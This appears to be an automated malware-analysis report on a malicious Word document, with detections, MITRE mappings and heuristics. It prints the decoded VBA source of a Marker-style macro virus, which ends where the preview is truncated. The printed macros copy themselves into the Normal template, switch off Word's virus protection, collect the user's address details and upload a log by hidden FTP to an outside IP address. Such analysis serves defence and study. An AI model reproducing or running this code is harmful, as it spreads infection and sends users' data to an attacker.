MALICIOUS
280
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the presence of a Shell() call within its VBA macros. The Document_Open macro is present and configured to execute code, which is further supported by the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic. This suggests the macro is designed to run arbitrary commands, likely to download and execute a second-stage payload, as indicated by ClamAV detections of 'Doc.Trojan.Marker-31' and 'Doc.Trojan.Locale-1'.
Heuristics 5
-
ClamAV: Doc.Trojan.Marker-31 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Marker-31
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25633 bytes |
SHA-256: 5aae7916a3665c7794b1cecf67e844c70ebdea11269df31dca4e6b6bbec0411d |
|||
|
Detection
ClamAV:
Doc.Trojan.Locale-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Set newDocument = Documents(1)
nextRoutine = "Document_Open"
Set prevDocument = ActiveDocument
Set nextDocument = NormalTemplate
With nextDocument.VBProject.VBComponents
For I = 1 To .Count
If .Item(I).Type = 100 Then
With .Item(I).CodeModule
If Not .Find("Sub " + nextRoutine + "()", 1, 1, .CountOfLines, 10) Then
With prevDocument.VBProject.VBComponents.Item(1).CodeModule
codeString = .Lines(.ProcStartLine(nextRoutine, vbext_pk_Proc), .ProcCountLines(nextRoutine, vbext_pk_Proc))
End With
End If
.AddFromString codeString
.ReplaceLine 1, "Private Sub " + nextRoutine + "()"
If prevDocument Is NormalTemplate Then
.ReplaceLine 5, " Set prevDocument = ActiveDocument"
.ReplaceLine 6, " Set nextDocument = NormalTemplate"
Else
.ReplaceLine 5, " Set prevDocument = NormalTemplate"
.ReplaceLine 6, " Set nextDocument = newDocument"
End If
End With
End If
Next
End With
End Sub
Private Sub Document_Close()
On Error Resume Next
Const Marker = "<- this is a marker!"
'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
'Switch the VirusProtection OFF
Options.VirusProtection = False
If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
If DocumentInfected = True Then
LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
ElseIf NormalTemplateInfected = True Then
LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
End If
LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
For I = 1 To 4
LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next I
LogFile = "C:\hsf" & LogFile & ".sys"
Open LogFile For Output As #1
Print #1, LogData
Close #1
Open "c:\netldx.vxd" For Output As #1
Print #1, "o 209.201.88.110"
Print #1, "user anonymous"
Print #1, "pass itsme@"
Print #1, "cd incoming"
Print #1, "ascii"
Print #1, "put " & LogFile
Print #1, "quit"
Close #1
Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
End If
'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate) Then
'Infect the NormalTemplate
If DocumentInfected = True Then
SaveNormalTemplate = NormalTemplate.Saved
OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
'Write a log file of this NormalTemplate infection
For I = 1 To Len(Application.UserAddress)
If Mid(Application.UserAddress, I, 1) <> Chr(13) Then
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.